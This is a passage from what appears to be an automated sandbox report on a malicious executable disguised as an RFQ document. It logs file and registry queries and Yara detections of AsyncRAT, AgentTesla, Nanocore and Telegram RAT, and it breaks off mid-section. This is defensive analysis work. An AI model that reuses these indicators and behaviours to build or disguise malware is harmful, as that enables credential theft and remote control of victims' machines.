                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Users\user\AppData\Local\Temp\mozille.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Users\user\AppData\Local\Temp\mozille.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Lowering of HIPS / PFW / Operating System Security Settings:

                  barindex
                  Yara detected AsyncRATShow sources
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.RFQ_GGMC-Ref 12-01-2022.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.277261c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.mozille.exe.26c25b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000015.00000002.564363154.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.335571895.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.389862678.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.390327325.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000003.453796076.00000000056C5000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.335001041.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.359864523.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.388653976.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.334452217.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.333878908.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.390769248.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.571714369.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6964, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: mozille.exe PID: 6316, type: MEMORYSTR

                  Stealing of Sensitive Information:

                  barindex
                  Yara detected Telegram RATShow sources
                  Source: Yara matchFile source: 0000001D.00000002.574363580.0000000002F31000.00000004.00000001.sdmp, type: MEMORY
                  Yara detected AgentTeslaShow sources
                  Source: Yara matchFile source: 0000001D.00000000.485797688.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000000.487776252.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000000.486771579.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000000.484899643.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.564381690.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.493963326.00000000042D9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.574363580.0000000002F31000.00000004.00000001.sdmp, type: MEMORY
                  Yara detected Nanocore RATShow sources
                  Source: Yara matchFile source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.575326002.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.578385897.0000000005530000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000028.00000002.572373638.0000000002B81000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001D.00000002.574363580.0000000002F31000.00000004.00000001.sdmp, type: MEMORY

                  Remote Access Functionality:

                  barindex
                  Yara detected Telegram RATShow sources
